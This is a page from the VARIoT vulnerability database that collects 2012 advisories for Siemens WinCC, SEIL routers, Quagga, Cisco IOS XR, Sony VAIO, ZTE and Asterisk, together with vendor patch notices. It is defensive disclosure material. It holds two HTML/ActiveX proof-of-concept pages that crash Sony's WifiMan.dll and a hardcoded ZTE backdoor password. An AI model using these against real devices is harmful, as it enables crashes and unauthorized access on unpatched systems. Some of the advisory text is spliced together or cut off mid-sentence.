VARIoT IoT vulnerabilities database

VAR-201206-0115 CVE-2012-3003 Siemens WinCC of Web Application open redirect vulnerability

Related entries in the VARIoT exploits database: VAR-E-201206-0992
CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
Open redirect vulnerability in an unspecified web application in Siemens WinCC 7.0 SP3 before Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a GET request.

WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible does not filter out specially crafted characters when parsing URL parameters, and there is a security hole in the implementation. An attacker could exploit the vulnerability to redirect a user to a malicious site.

Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. A related vulnerability is caused by an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default).

TITLE: Siemens SIMATIC WinCC Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA49341
VERIFY ADVISORY: http://secunia.com/advisories/49341/
RELEASE DATE: 2012-06-07

DESCRIPTION: A weakness and some vulnerabilities have been reported in Siemens SIMATIC WinCC, which can be exploited by malicious users to disclose potentially sensitive information and system information and manipulate certain data, and by malicious people to conduct spoofing and cross-site scripting attacks.

1) Certain input passed via URL parameters to two unspecified web applications is not properly sanitised before being used to construct an XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code and e.g. read or write certain system settings.

2) Certain input passed via a filename to two unspecified web applications is not properly verified before being used to display files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences.

3) Certain input passed to two unspecified web applications is not properly sanitised before being returned to the user.

4) Certain input is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

The weakness and the vulnerabilities are reported in version 7.0 SP3.

SOLUTION: Apply "Update 2" (please see the vendor's advisory for details).

PROVIDED AND/OR DISCOVERED BY:
1-3) The vendor credits Gleb Gritsai, Alexander Zaitsev, Sergey Scherbel, Yuri Goltsev, Dmitry Serebryannikov, Sergey Bobrov, Denis Baranov, and Andrey Medov, Positive Technologies.
4) Reported by the vendor.

ORIGINAL ADVISORY:
Siemens: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-223158.pdf
ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-158-01.pdf
VAR-201206-0071 CVE-2012-2595 Siemens WinCC Cross-Site Scripting Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201206-0992
CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 allow remote attackers to inject arbitrary web script or HTML via vectors involving special characters in parameters.

WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. A related vulnerability is caused by an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default).

See Secunia advisory SA49341 (http://secunia.com/advisories/49341/), reproduced under VAR-201206-0115 above; item 3 of that advisory covers this issue.
VAR-201206-0509 No CVE IIJ SEIL Multiple Product Security Bypass Vulnerabilities

CVSS V2: -
CVSS V3: -
Severity: -
Multiple SEIL products are prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass the security mechanisms built into an affected device. This may aid in further attacks. Note: Successful exploitation requires that HTTP-Proxy is set and 'Application-Gateway' is enabled.

The following products are vulnerable:
* SEIL/x86 1.00 through 2.35
* SEIL/X1 2.30 through 3.75
* SEIL/X2 2.30 through 3.75
* SEIL/B1 2.30 through 3.75
VAR-201206-0410 CVE-2012-2632 SEIL series fail to restrict access permissions

CVSS V2: 2.6
CVSS V3: -
Severity: LOW
SEIL routers with firmware SEIL/x86 1.00 through 2.35, SEIL/X1 2.30 through 3.75, SEIL/X2 2.30 through 3.75, and SEIL/B1 2.30 through 3.75, when the http-proxy and application-gateway features are enabled, do not properly handle the CONNECT command, which allows remote attackers to bypass intended URL restrictions via a TCP session.

SEIL series are wireless LAN routers. SEIL series contain an issue where access permissions are not restricted. An attacker that can access the product's HTTP proxy may bypass restrictions such as the URL filter.

The SEIL Router is a router from Japan's SEIL vendors. A security vulnerability exists in the SEIL Router that allows malicious users to bypass some security restrictions. There is an error in the HTTP-Proxy/Gateway function provided by the router. To successfully exploit the vulnerability, HTTP-Proxy must be set and "Application-Gateway" must be enabled.

TITLE: SEIL Routers HTTP-Proxy/Gateway Functionality Security Bypass Vulnerability
SECUNIA ADVISORY ID: SA49365
VERIFY ADVISORY: http://secunia.com/advisories/49365/
RELEASE DATE: 2012-06-06

DESCRIPTION: A vulnerability has been reported in SEIL routers, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error within the HTTP-Proxy/Gateway functionality and can be exploited to e.g.

The vulnerability is reported in the following products and versions:
* SEIL/x86 firmware versions 1.00 through 2.35.
* SEIL/X1 firmware versions 2.30 through 3.75.
* SEIL/X2 firmware versions 2.30 through 3.75.
* SEIL/B1 firmware versions 2.30 through 3.75.

SOLUTION: Update to a fixed version.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY:
SEIL: http://www.seil.jp/support/security/a01232.html
VAR-201206-0073 CVE-2012-2597 Siemens WinCC Directory Traversal Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201206-0992
CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
Multiple directory traversal vulnerabilities in Siemens WinCC 7.0 SP3 before Update 2 allow remote authenticated users to read arbitrary files via a crafted parameter in a URL.

WinCC flexible is a human-machine interface for use in some machine or process applications. An attacker can exploit the vulnerability to read arbitrary files. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. A related vulnerability is caused by an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default).

See Secunia advisory SA49341 (http://secunia.com/advisories/49341/), reproduced under VAR-201206-0115 above; item 2 of that advisory covers this issue.
VAR-201206-0074 CVE-2012-2598 Siemens WinCC Buffer Overflow Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201206-0992
CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 through Update 2 allows remote attackers to cause a denial of service (agent outage) via crafted input.

WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible does not filter out specially crafted characters when parsing URL parameters, and there is a buffer overflow vulnerability in the implementation. An attacker could exploit the vulnerability to cause a denial of service. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default).

See Secunia advisory SA49341 (http://secunia.com/advisories/49341/), reproduced under VAR-201206-0115 above, for the related WinCC 7.0 SP3 web application issues fixed by Update 2.
VAR-201206-0183 CVE-2012-3815 Sielco Sistemi Winlog Lite Buffer Overflow Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201206-0149, VAR-E-201206-0148
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Buffer overflow in RunTime.exe in Sielco Sistemi Winlog Pro SCADA before 2.07.18 and Winlog Lite SCADA before 2.07.18 allows remote attackers to execute arbitrary code via a crafted packet to TCP port 46824. NOTE: some of these details are obtained from third party information. SIELCO SISTEMI Winlog is an application for data acquisition and remote control of SCADA HMI monitoring software. There is a security hole in Winlog Pro/lite. Winlog Pro/lite has an input validation error. Unauthorized users can send special requests to the TCP 46824 port to access the read system files. Winlog Lite is prone to a remote buffer-overflow vulnerability. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Winlog Packet Processing Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA49395 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49395/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49395 RELEASE DATE: 2012-06-06 DISCUSS ADVISORY: http://secunia.com/advisories/49395/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49395/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49395 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING 
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: m1k3 has discovered a vulnerability in Winlog, which can be exploited by malicious people to compromise a vulnerable system. Successful exploitation allows execution of arbitrary code, but requires a project to be configured for TCP server mode (not by default). The vulnerability is confirmed in version 2.07.14. Other versions may also be affected. SOLUTION: Restrict access to trusted hosts only. PROVIDED AND/OR DISCOVERED BY: m1k3 ORIGINAL ADVISORY: http://www.s3cur1ty.de/m1adv2012-001 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. 
VAR-201206-0262 CVE-2012-1820 Quagga BGP OPEN denial of service vulnerability
CVSS V2: 2.9
CVSS V3: -
Severity: LOW
The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and earlier allows remote attackers to cause a denial of service (assertion failure and daemon exit) by leveraging a BGP peering relationship and sending a malformed Outbound Route Filtering (ORF) capability TLV in an OPEN message. Quagga, a routing software suite, contains a BGP OPEN vulnerability that results in a denial-of-service condition. The flaw lies in the handling of BGP OPEN messages by the bgp_capability_orf() function in the Quagga routing software; a remote third party can exploit it to interrupt service (DoS). Exploiting this issue allows remote attackers to cause the vulnerable daemon to crash, denying further service to legitimate users. Quagga 0.99.20.1 and prior versions are vulnerable. For the stable distribution (squeeze), this problem has been fixed in version 0.99.20.1-0+squeeze3. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 0.99.21-3.
TITLE: Quagga "bgp_capability_orf()" Denial of Service Vulnerability
SECUNIA ADVISORY ID: SA49401
VERIFY ADVISORY: http://secunia.com/advisories/49401/
RELEASE DATE: 2012-06-08
DESCRIPTION: A vulnerability has been reported in Quagga, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused by an error in the "bgp_capability_orf()" function when parsing OPEN messages containing an ORF capability TLV. This can be exploited to cause a buffer overflow via a specially crafted packet. Successful exploitation requires control of a pre-configured BGP peer.
SOLUTION: Restrict access to trusted BGP peers only.
PROVIDED AND/OR DISCOVERED BY: US-CERT credits Denis Ovsienko.
ORIGINAL ADVISORY: US-CERT: http://www.kb.cert.org/vuls/id/962587

The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Gentoo Linux Security Advisory GLSA 201310-08
http://security.gentoo.org/
Severity: Normal
Title: Quagga: Multiple vulnerabilities
Date: October 10, 2013
Bugs: #408507, #475706
ID: 201310-08

Synopsis
========
Multiple vulnerabilities have been found in Quagga, the worst of which could lead to arbitrary code execution.

Affected packages
=================
Package / Vulnerable / Unaffected
1 net-misc/quagga < 0.99.22.4 >= 0.99.22.4

Description
===========
Multiple vulnerabilities have been discovered in Quagga. Please review the CVE identifiers referenced below for details.

Impact
======
A remote attacker may be able to cause arbitrary code execution or a Denial of Service condition.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
All Quagga users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/quagga-0.99.22.4"

References
==========
[ 1 ] CVE-2012-0249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0249
[ 2 ] CVE-2012-0250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0250
[ 3 ] CVE-2012-0255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0255
[ 4 ] CVE-2012-1820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1820
[ 5 ] CVE-2013-2236 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2236

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201310-08.xml

Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Red Hat Security Advisory
Synopsis: Moderate: quagga security update
Advisory ID: RHSA-2012:1259-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1259.html
Issue date: 2012-09-12
CVE Names: CVE-2011-3323 CVE-2011-3324 CVE-2011-3325 CVE-2011-3326 CVE-2011-3327 CVE-2012-0249 CVE-2012-0250 CVE-2012-0255 CVE-2012-1820

1. Summary:
Updated quagga packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

2. Relevant releases/architectures:
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

3. The Quagga ospfd and ospf6d daemons implement the OSPF (Open Shortest Path First) routing protocol.
A heap-based buffer overflow flaw was found in the way the bgpd daemon processed malformed Extended Communities path attributes. An attacker could send a specially-crafted BGP message, causing bgpd on a target system to crash or, possibly, execute arbitrary code with the privileges of the user running bgpd. The UPDATE message would have to arrive from an explicitly configured BGP peer, but could have originated elsewhere in the BGP network. (CVE-2011-3327)

A stack-based buffer overflow flaw was found in the way the ospf6d daemon processed malformed Link State Update packets. An OSPF router could use this flaw to crash ospf6d on an adjacent router. (CVE-2011-3323)

A flaw was found in the way the ospf6d daemon processed malformed link state advertisements. An OSPF neighbor could use this flaw to crash ospf6d on a target system. (CVE-2011-3324)

A flaw was found in the way the ospfd daemon processed malformed Hello packets. An OSPF neighbor could use this flaw to crash ospfd on a target system. (CVE-2011-3325)

A flaw was found in the way the ospfd daemon processed malformed link state advertisements. An OSPF router in the autonomous system could use this flaw to crash ospfd on a target system. (CVE-2011-3326)

An assertion failure was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to cause ospfd on an adjacent router to abort. (CVE-2012-0249)

A buffer overflow flaw was found in the way the ospfd daemon processed certain Link State Update packets. An OSPF router could use this flaw to crash ospfd on an adjacent router. (CVE-2012-0250)

Two flaws were found in the way the bgpd daemon processed certain BGP OPEN messages. A configured BGP peer could cause bgpd on a target system to abort via a specially-crafted BGP OPEN message.
(CVE-2012-0255, CVE-2012-1820)

Red Hat would like to thank CERT-FI for reporting CVE-2011-3327, CVE-2011-3323, CVE-2011-3324, CVE-2011-3325, and CVE-2011-3326; and the CERT/CC for reporting CVE-2012-0249, CVE-2012-0250, CVE-2012-0255, and CVE-2012-1820. CERT-FI acknowledges Riku Hietamäki, Tuomo Untinen and Jukka Taimisto of the Codenomicon CROSS project as the original reporters of CVE-2011-3327, CVE-2011-3323, CVE-2011-3324, CVE-2011-3325, and CVE-2011-3326. The CERT/CC acknowledges Martin Winter at OpenSourceRouting.org as the original reporter of CVE-2012-0249, CVE-2012-0250, and CVE-2012-0255, and Denis Ovsienko as the original reporter of CVE-2012-1820.

Users of quagga should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the bgpd, ospfd, and ospf6d daemons will be restarted automatically.

4. Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258

5. Package List:

Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm
i386: quagga-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm
ppc64: quagga-0.99.15-7.el6_3.2.ppc64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc64.rpm
s390x: quagga-0.99.15-7.el6_3.2.s390x.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390x.rpm
x86_64: quagga-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm
i386: quagga-contrib-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm
ppc64: quagga-contrib-0.99.15-7.el6_3.2.ppc64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc.rpm quagga-debuginfo-0.99.15-7.el6_3.2.ppc64.rpm quagga-devel-0.99.15-7.el6_3.2.ppc.rpm quagga-devel-0.99.15-7.el6_3.2.ppc64.rpm
s390x: quagga-contrib-0.99.15-7.el6_3.2.s390x.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390.rpm quagga-debuginfo-0.99.15-7.el6_3.2.s390x.rpm quagga-devel-0.99.15-7.el6_3.2.s390.rpm quagga-devel-0.99.15-7.el6_3.2.s390x.rpm
x86_64: quagga-contrib-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm
i386: quagga-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm
x86_64: quagga-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/quagga-0.99.15-7.el6_3.2.src.rpm
i386: quagga-contrib-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm
x86_64: quagga-contrib-0.99.15-7.el6_3.2.x86_64.rpm quagga-debuginfo-0.99.15-7.el6_3.2.i686.rpm quagga-debuginfo-0.99.15-7.el6_3.2.x86_64.rpm quagga-devel-0.99.15-7.el6_3.2.i686.rpm quagga-devel-0.99.15-7.el6_3.2.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

7. References:
https://www.redhat.com/security/data/cve/CVE-2011-3323.html
https://www.redhat.com/security/data/cve/CVE-2011-3324.html
https://www.redhat.com/security/data/cve/CVE-2011-3325.html
https://www.redhat.com/security/data/cve/CVE-2011-3326.html
https://www.redhat.com/security/data/cve/CVE-2011-3327.html
https://www.redhat.com/security/data/cve/CVE-2012-0249.html
https://www.redhat.com/security/data/cve/CVE-2012-0250.html
https://www.redhat.com/security/data/cve/CVE-2012-0255.html
https://www.redhat.com/security/data/cve/CVE-2012-1820.html
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2012 Red Hat, Inc.

Ubuntu Security Notice USN-1605-1
October 11, 2012
quagga vulnerability

A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.04 LTS

Summary:
Quagga could be made to crash if it received specially crafted network traffic.

Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: quagga 0.99.20.1-0ubuntu0.12.04.3
Ubuntu 11.10: quagga 0.99.20.1-0ubuntu0.11.10.3
Ubuntu 11.04: quagga 0.99.20.1-0ubuntu0.11.04.3
Ubuntu 10.04 LTS: quagga 0.99.20.1-0ubuntu0.10.04.3

After a standard system update you need to restart Quagga to make all the necessary changes
VAR-201205-0146 CVE-2012-2488 Cisco IOS XR on Cisco ASR 9000 and CRS Series denial of service (DoS) vulnerability

Related entries in the VARIoT exploits database: VAR-E-201205-0006
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco IOS XR before 4.2.1 on ASR 9000 series devices and CRS series devices allows remote attackers to cause a denial of service (packet transmission outage) via a crafted packet, aka Bug IDs CSCty94537 and CSCtz62593. The issue is tracked as Bug IDs CSCty94537 and CSCtz62593. A third party may be able to cause a denial of service (halting packet transmission) via a crafted packet. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. On the Processor (PRP). The attacker can send a specially crafted packet to the affected system, causing packets originating from the route processor CPU to stop being transmitted to the fabric, which results in a denial of service. This issue is being tracked by Cisco Bug IDs CSCty94537 (ASR 9000) and CSCtz62593 (CRS).
TITLE: Cisco IOS XR Denial of Service Vulnerability
SECUNIA ADVISORY ID: SA49329
VERIFY ADVISORY: http://secunia.com/advisories/49329/
RELEASE DATE: 2012-05-31
DESCRIPTION: A vulnerability has been reported in Cisco IOS XR, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused by an unspecified error when processing certain packets and can be exploited to stop outbound packets from being transmitted via specially crafted packets sent to a configured address on the device. NOTE: Transit traffic packets do not trigger this vulnerability. Please see the vendor's advisory for the list of affected products and versions.
SOLUTION: Apply updates. Please see the vendor's advisory for more information.
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120530-iosxr
VAR-201206-0197 CVE-2012-0985 Multiple Sony products Wireless Manager ActiveX control buffer overflow vulnerability
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Multiple buffer overflows in the Wireless Manager ActiveX control 4.0.0.0 in WifiMan.dll in Sony VAIO PC Wireless LAN Wizard 1.0; VAIO Wireless Wizard 1.00, 1.00_64, 1.0.1, 2.0, and 3.0; SmartWi Connection Utility 4.7, 4.7.4, 4.8, 4.9, 4.10, and 4.11; and VAIO Easy Connect software 1.0.0 and 1.1.0 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in the second argument of the (1) SetTmpProfileOption or (2) ConnectToNetwork method. Sony VAIO Wireless Manager ActiveX control ('WifiMan.dll') is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may exploit these issues to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. Sony VAIO Wireless Manager 4.0.0.0 is vulnerable; prior versions may also be affected. Sony VAIO is a computer system produced by Sony Corporation. If the attack fails, it will result in a denial of service.

Advisory ID: HTB23063
Product: Wireless Manager Sony VAIO
Vendor: Sony Computers
Vulnerable Version(s): 4.0.0.0 and probably prior
Tested Version: 4.0.0.0
Vendor Notification: 7 December 2011
Vendor Patch: 20 January 2012
Public Disclosure: 30 May 2012
Vulnerability Type: Buffer Overflow
CVE Reference: CVE-2012-0985
Solution Status: Fixed by Vendor
Risk Level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )

Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on a vulnerable system.
1) Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985

1.1 The method SetTmpProfileOption() in the WifiMan.dll library does not properly check the length of string parameters. The following PoC will crash the application:

    <HTML>
    <BODY>
    <object id=ctrl classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
    <SCRIPT>
    function Do_() {
      arg1=1
      arg2=String(8212, "X")
      arg3="defaultV"
      SetTmpProfileOption arg1 ,arg2 ,arg3
    }
    </SCRIPT>
    <input language=JavaScript onclick=Do_() type=button value="Sony_POC">
    </BODY>
    </HTML>

1.2 The method ConnectToNetwork() in the WifiMan.dll library does not properly check the length of string parameters. The following PoC will crash the application:

    <HTML>
    <BODY>
    <object id=ctrl classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
    <SCRIPT>
    function Do_() {
      arg1=1
      arg2=String(6164, "X")
      target.ConnectToNetwork arg1 ,arg2
    }
    </SCRIPT>
    <input language=JavaScript onclick=Do_() type=button value="Sony_POC">
    </BODY>
    </HTML>

Solution:
Sony has released a security update for the Affected Models that resolves this issue. Sony recommends that all customers who have Affected Models immediately install the latest version of the software by using VAIO Update. Note: If you are using the default VAIO Update settings the update will be installed automatically.
More information and security update: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946

References:
[1] High-Tech Bridge Advisory HTB23063 - https://www.htbridge.com/advisory/HTB23063 - Buffer Overflow in Wireless Manager Sony VAIO.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

TITLE: Sony VAIO WifiMan ActiveX Control Two Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA49340
VERIFY ADVISORY: http://secunia.com/advisories/49340/
RELEASE DATE: 2012-06-01
DESCRIPTION: High-Tech Bridge SA has reported two vulnerabilities in Sony VAIO WifiMan ActiveX Control, which can be exploited by malicious people to compromise a user's system. Successful exploitation of the vulnerabilities may allow execution of arbitrary code.
PROVIDED AND/OR DISCOVERED BY: High-Tech Bridge SA
ORIGINAL ADVISORY: Sony: http://esupport.sony.com/US/perl/support-info.pl?template_id=1&info_id=946 High-Tech Bridge SA: https://www.htbridge.com/advisory/HTB23063
VAR-201205-0159 CVE-2012-2949 ZTE sync_agent program for Android on the ZTE Score M device privilege escalation vulnerability
CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The ZTE sync_agent program for Android 2.3.4 on the Score M device uses a hardcoded ztex1609523 password to control access to commands, which allows remote attackers to gain privileges via a crafted application. ZTE Score M is an Android smartphone. ZTE Score M is prone to a security-bypass vulnerability caused by a hard-coded password. An attacker can exploit this issue by enticing an unsuspecting victim to install a malicious application on the device. Successful attacks can allow a remote attacker to gain unauthorized root access to the vulnerable device. The vulnerability stems from the use of the hardcoded ztex1609523 password to control access to commands.
VAR-201206-0140 CVE-2012-2948 Certified Asterisk and Asterisk Open Source denial of service (DoS) vulnerability
CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
chan_skinny.c in the Skinny (aka SCCP) channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by closing a connection in off-hook mode. Asterisk is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to trigger a NULL-pointer dereference and cause a system crash, denying service to legitimate users.

